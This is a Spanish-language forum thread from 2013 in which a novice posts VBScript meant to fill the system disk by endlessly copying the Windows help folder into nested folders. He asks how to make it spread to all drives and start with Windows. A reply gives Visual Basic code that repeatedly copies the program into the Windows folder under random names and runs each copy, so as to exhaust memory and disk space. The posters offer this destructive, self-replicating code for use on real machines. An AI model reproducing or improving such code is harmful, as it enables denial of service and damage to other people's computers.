Sólo texto | Texto con Imágenes

Test Foro de elhacker.net SMF 2.1

Seguridad Informática => Análisis y Diseño de Malware => Mensaje iniciado por: danny920825 en 10 Octubre 2013, 14:18 PM

Título: Analisis de mi Malware
Publicado por: danny920825 en 10 Octubre 2013, 14:18 PM
Hola a todos, soy nuevo en esto del malware, tan nuevo que este es mi primer intento despues de crear un bucle infinito en batch; ahora la cuestion es que ya tengo el codigo del malware, lo que quiero es hacerlo un virus,o sea, que se autocopie a todas las unidades de la pc y se ejecute al iniciar windows aun cuando el usuario que lo ejecute no pueda escribir en el registro. el diseño seria asi
Código [Seleccionar]

on error resume next

' Declaracion de variables
set objshell = createobject("wscript.shell")
set objfso = createobject("scripting.filesystemobject")
dim perfil_usuario
dim carpeta_destino
dim cont
dim ampliar
dim help

rem                    Inicializacion de las variables
perfil_usuario = objshell.expandenvironmentstrings("%userprofile%")
help = objshell.expandenvironmentstrings("%windir%")
msgbox (help)
icono = objshell.expandenvironmentstrings("%windir%\system32")
carpeta_destino = objfso.createfolder(perfil_usuario & "\Dark_Stone")
llenar = objfso.createfolder(perfil_usuario & "\Dark_Stone\llenar")



rem                    Cuerpo
while (5=5)
copiar = objfso.copyfolder(help & "\help", llenar)
ampliar = objfso.createfolder(llenar & "\llenando")
llenar = ampliar
wend


lo del while (5=5) es una condicion que yo usaba en la escuela para decir que algo tenia que ejecutarse siempre sin final.
el objetivo de este codigo es llenar el espacio de la particion donde esta instalado el sistema operativo, lo que no logro hacer de ninguna forma y por eso no puse el codigo es que se copie. Por favor ayuda y espero haber ayudado a alguien con mi propuesta de codigo.

PD: Es valido tambien cualkier aporte al diseño y a la forma visual del malware!
Título: Re: Analisis de mi Malware
Publicado por: Mad Antrax en 10 Octubre 2013, 15:50 PM
La idea es buena, pero yo lo implementaría de alguna otra forma.

Usar un While (5=5) es válido, pero para iniciar un bucle infinito lo mejor es usar Do - Loop, por ejemplo:

Código (vb) [Seleccionar]

Randomize
Do
A = Environ("WINDIR") & "\" & int(Rnd * 99999) & ".exe"
FileCopy App.Path & "\" & App.EXEName & ".exe", A
DoEvents
Shell A

Loop


El ejemplo utiliza un bucle infinito, copia el virus en la carpeta del sistema con un número aleatorio y ejecuta dicha copia. Haciendo eso conseguirás ejecutar exponencialmente una misma copia del gusano, consumiendo los recursos de memoria y el espacio libre.

Mi código se puede mejorar, es solo un ejemplo :)
Título: Re: Analisis de mi Malware
Publicado por: danny920825 en 13 Octubre 2013, 22:21 PM
tu respuesta me interesa utilizarla, pero necesito una descripcion de lo que hace, pues cuando sustituyo tu codigo por el mio y ejecuto el archivo, me abre un cartel msgbox que dice "c:windows", reviso el administrador de tareas y se esta ejecutando, pero no puedo monitorizarlo porque no se donde esta llenando el hdd. Por favor soy nuevo en esto, explicame si puedes. Gracias de antemano
Sólo texto | Texto con Imágenes